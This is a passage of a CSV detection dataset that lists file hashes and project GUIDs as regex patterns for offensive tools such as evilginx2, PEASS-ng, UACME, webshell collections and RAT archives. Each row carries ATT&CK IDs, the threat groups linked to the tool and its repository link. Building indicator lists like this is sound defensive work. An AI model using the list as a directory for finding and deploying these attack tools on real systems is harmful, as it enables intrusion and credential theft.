"*e97d6c8f6d2fc73bceefac93fdfa2c4724a68e58b26e4c2631e78580f2722d2a*",".{0,1000}e97d6c8f6d2fc73bceefac93fdfa2c4724a68e58b26e4c2631e78580f2722d2a.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/LuemmelSec/ntlmrelayx.py_to_exe","1","0","#filehash","N/A","10","1","86","17","2023-05-26T05:35:52Z","2023-05-15T17:58:26Z","42411"
"*e97da4284459149541ef261a6de0bec7ef8a3d2d28d3384b7b256c089d524690*",".{0,1000}e97da4284459149541ef261a6de0bec7ef8a3d2d28d3384b7b256c089d524690.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#filehash","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","42412"
"*e984f5efade9dcf131cc020a3c3ebf27f7b191eede39b09969be4d36a1ba9fb2*",".{0,1000}e984f5efade9dcf131cc020a3c3ebf27f7b191eede39b09969be4d36a1ba9fb2.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","42413"
"*e988e9a36810fb0fa0fb32556cb93c8ea4117e4176402ff74e397bd4a4d125d6*",".{0,1000}e988e9a36810fb0fa0fb32556cb93c8ea4117e4176402ff74e397bd4a4d125d6.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","42414"
"*e98bb5dcf6f202575e80431612a35d072adca1f57cb74d9e198dd51e6fe6a483*",".{0,1000}e98bb5dcf6f202575e80431612a35d072adca1f57cb74d9e198dd51e6fe6a483.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","42416"
"*e99068fa60039d7b7ad0969f858f228134218014143002abf149f220388b19ec*",".{0,1000}e99068fa60039d7b7ad0969f858f228134218014143002abf149f220388b19ec.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42417"
"*e99068fa60039d7b7ad0969f858f228134218014143002abf149f220388b19ec*",".{0,1000}e99068fa60039d7b7ad0969f858f228134218014143002abf149f220388b19ec.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42418"
"*e99068fa60039d7b7ad0969f858f228134218014143002abf149f220388b19ec*",".{0,1000}e99068fa60039d7b7ad0969f858f228134218014143002abf149f220388b19ec.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42419"
"*e99068fa60039d7b7ad0969f858f228134218014143002abf149f220388b19ec*",".{0,1000}e99068fa60039d7b7ad0969f858f228134218014143002abf149f220388b19ec.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42420"
"*E991E6A7-31EA-42E3-A471-90F0090E3AFD*",".{0,1000}E991E6A7\-31EA\-42E3\-A471\-90F0090E3AFD.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","#GUIDproject","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","42421"
"*e99696eaf1aef7f15ad9a71b917dfcc3bc9288c52808df07ac8f69a93f15aa9c*",".{0,1000}e99696eaf1aef7f15ad9a71b917dfcc3bc9288c52808df07ac8f69a93f15aa9c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42423"
"*e9986bdf879ff9f5e6dfd0fc90531bdc88e854e81a4354b7bf3cc0fd2aedae65*",".{0,1000}e9986bdf879ff9f5e6dfd0fc90531bdc88e854e81a4354b7bf3cc0fd2aedae65.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","42424"
"*e99a3bec641c578ceaa05b63b6544daf5b437361c1a5f8742808d8a09df5bca6*",".{0,1000}e99a3bec641c578ceaa05b63b6544daf5b437361c1a5f8742808d8a09df5bca6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42425"
"*e99ea45f1119a6feadf8bb999cb8e31705a1d8e0470f39144594aa7496de4895*",".{0,1000}e99ea45f1119a6feadf8bb999cb8e31705a1d8e0470f39144594aa7496de4895.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","42427"
"*e9a83a9f298baefdcb73e870ad9ec7253247bfa3b7450113c2b5a63e26a8b4ee*",".{0,1000}e9a83a9f298baefdcb73e870ad9ec7253247bfa3b7450113c2b5a63e26a8b4ee.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","42428"
"*e9b70f3a69ae5f1891a1f9b1b93aeb6745d632786e75bc111bc4c6b0ba201f58*",".{0,1000}e9b70f3a69ae5f1891a1f9b1b93aeb6745d632786e75bc111bc4c6b0ba201f58.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42430"
"*e9bddaa720ae081b0ef421bc7c8def328fecb3b4802e4d701297f421473b05bc*",".{0,1000}e9bddaa720ae081b0ef421bc7c8def328fecb3b4802e4d701297f421473b05bc.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","42431"
"*e9d37aeb31773787ae50b45e2a923edd31be7f27d1ff0ed5ee3bad45076d03d9*",".{0,1000}e9d37aeb31773787ae50b45e2a923edd31be7f27d1ff0ed5ee3bad45076d03d9.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","42434"
"*e9d6c9f3eeca8db9514443c50651c78b29d68756495d8d973c8d5c00123750e8*",".{0,1000}e9d6c9f3eeca8db9514443c50651c78b29d68756495d8d973c8d5c00123750e8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42435"
"*E9D90B2A-F563-4A5E-9EFB-B1D6B1E7F8CB*",".{0,1000}E9D90B2A\-F563\-4A5E\-9EFB\-B1D6B1E7F8CB.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","42436"
"*e9e2d2794db9b02818784c075f2b71f980803c2c8b372936d0d02cd43f3d05a3*",".{0,1000}e9e2d2794db9b02818784c075f2b71f980803c2c8b372936d0d02cd43f3d05a3.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","42438"
"*e9f65ac196e97ded72d97f6aa514c544c0d660983223a2cbefb6ba45a21973fe*",".{0,1000}e9f65ac196e97ded72d97f6aa514c544c0d660983223a2cbefb6ba45a21973fe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42440"
"*E9F7C24C-879D-49F2-B9BF-2477DC28E2EE*",".{0,1000}E9F7C24C\-879D\-49F2\-B9BF\-2477DC28E2EE.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#GUIDproject","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","42441"
"*e9f9a1009bda251364507673531fb1187d34198ade2c48f7c4e6fe6b76a7d088*",".{0,1000}e9f9a1009bda251364507673531fb1187d34198ade2c48f7c4e6fe6b76a7d088.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42442"
"*e9fff62c4585ae6de84da278a20e754ff3ff9ccdd0f11041a43eae84a54a622d*",".{0,1000}e9fff62c4585ae6de84da278a20e754ff3ff9ccdd0f11041a43eae84a54a622d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42445"
"*ea080f879bb8b915bc671813077aed9e350b286df348dfc5a84429a816fc8b96*",".{0,1000}ea080f879bb8b915bc671813077aed9e350b286df348dfc5a84429a816fc8b96.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42449"
"*ea10050aaa6ca06ddceb1e7e47205bf8a59b4f01918dcd7e22cca7aad5613d13*",".{0,1000}ea10050aaa6ca06ddceb1e7e47205bf8a59b4f01918dcd7e22cca7aad5613d13.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","42450"
"*ea17314d15bea466526ba9ca154009f04f46da461899ac4533d00479317703b8*",".{0,1000}ea17314d15bea466526ba9ca154009f04f46da461899ac4533d00479317703b8.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","42452"
"*ea1e3b04e30cb4192671bf6a15f42bbb9aab140b59ab0d4097bb36459def54eb*",".{0,1000}ea1e3b04e30cb4192671bf6a15f42bbb9aab140b59ab0d4097bb36459def54eb.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","42454"
"*ea1f91ef5b0a9befefc831e9c1093cc202e214673b7fbbb1b737fab9f5326c53*",".{0,1000}ea1f91ef5b0a9befefc831e9c1093cc202e214673b7fbbb1b737fab9f5326c53.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","#filehash","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","42456"
"*ea20980ea983bf6033a3c2e1a1e1b17a3915867e9e6ed44beae3bbae70bc5cd4*",".{0,1000}ea20980ea983bf6033a3c2e1a1e1b17a3915867e9e6ed44beae3bbae70bc5cd4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42458"
"*ea240f25e5b63c24148a4f4e4393fdb4a00a3a6c6e3038e395b533663762415f*",".{0,1000}ea240f25e5b63c24148a4f4e4393fdb4a00a3a6c6e3038e395b533663762415f.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","42459"
"*ea256adf2c7038dbbfa75b30c41364c29b9b8680bfccea9ccd33d33c16e63066*",".{0,1000}ea256adf2c7038dbbfa75b30c41364c29b9b8680bfccea9ccd33d33c16e63066.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42460"
"*ea2cd6a3926a99ffb0053a14a21829b88d3f62cb5290bf471eb21930041bc974*",".{0,1000}ea2cd6a3926a99ffb0053a14a21829b88d3f62cb5290bf471eb21930041bc974.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42462"
"*ea2eacb07d4b1fbe1d8db075a3c497746b8268894797b573c86451b5628f8f5c*",".{0,1000}ea2eacb07d4b1fbe1d8db075a3c497746b8268894797b573c86451b5628f8f5c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42463"
"*ea3087204e3ed644308a0a96bbf319590a9b2701ac850bb63f2ba3dc4955f1fd*",".{0,1000}ea3087204e3ed644308a0a96bbf319590a9b2701ac850bb63f2ba3dc4955f1fd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42464"
"*ea36b8a42cc8ef052c4b58d29bdd20c5fe95dd8a025f8ac4728046891ef281bc*",".{0,1000}ea36b8a42cc8ef052c4b58d29bdd20c5fe95dd8a025f8ac4728046891ef281bc.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","42467"
"*ea3749e4487dc724a97d4794a19b2921814b57087aafc66176c434c9605fe939*",".{0,1000}ea3749e4487dc724a97d4794a19b2921814b57087aafc66176c434c9605fe939.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42468"
"*ea4813fb19c07cb9d7c111c4808fa3eee05e3bf62694bc2481e50465c8853fda*",".{0,1000}ea4813fb19c07cb9d7c111c4808fa3eee05e3bf62694bc2481e50465c8853fda.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","42472"
"*ea49111ee3bf716e9f4643f95b5df19fd8bd7376464b2795dcfc5e07ddda35eb*",".{0,1000}ea49111ee3bf716e9f4643f95b5df19fd8bd7376464b2795dcfc5e07ddda35eb.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","#filehash","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","42473"
"*ea4f2fa909653aa2c186bd78bca337abdd3aa7dc7277a510c4d6ffc692284ee8*",".{0,1000}ea4f2fa909653aa2c186bd78bca337abdd3aa7dc7277a510c4d6ffc692284ee8.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","42474"
"*ea552615337ba9becf9c1341f4ad2556b204dca25982c123b2cfd6e218192b49*",".{0,1000}ea552615337ba9becf9c1341f4ad2556b204dca25982c123b2cfd6e218192b49.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","42476"
"*ea5653d977893407bd10f7c727996a317c378b02422e7c6d8f44e8959ad8ceb4*",".{0,1000}ea5653d977893407bd10f7c727996a317c378b02422e7c6d8f44e8959ad8ceb4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42477"
"*ea5dff2a0ded86187908ea824cf142496825b8eecc469c4351cb1cb99a36a07f*",".{0,1000}ea5dff2a0ded86187908ea824cf142496825b8eecc469c4351cb1cb99a36a07f.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","42478"
"*ea5f032c532c30628da6fc76f5a4ad6ca4057ac2322f625b12fc907beadfc545*",".{0,1000}ea5f032c532c30628da6fc76f5a4ad6ca4057ac2322f625b12fc907beadfc545.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs -  detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#filehash","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","42479"
"*ea66527a0ec811d05d7976438d50982fc3c2fd4ad86a6a089b154f7d49de0c0e*",".{0,1000}ea66527a0ec811d05d7976438d50982fc3c2fd4ad86a6a089b154f7d49de0c0e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42480"
"*ea707d12f05cf7fe93ca743158ae20c91ee663c50bd738b776d1183d1c8c7db2*",".{0,1000}ea707d12f05cf7fe93ca743158ae20c91ee663c50bd738b776d1183d1c8c7db2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42482"
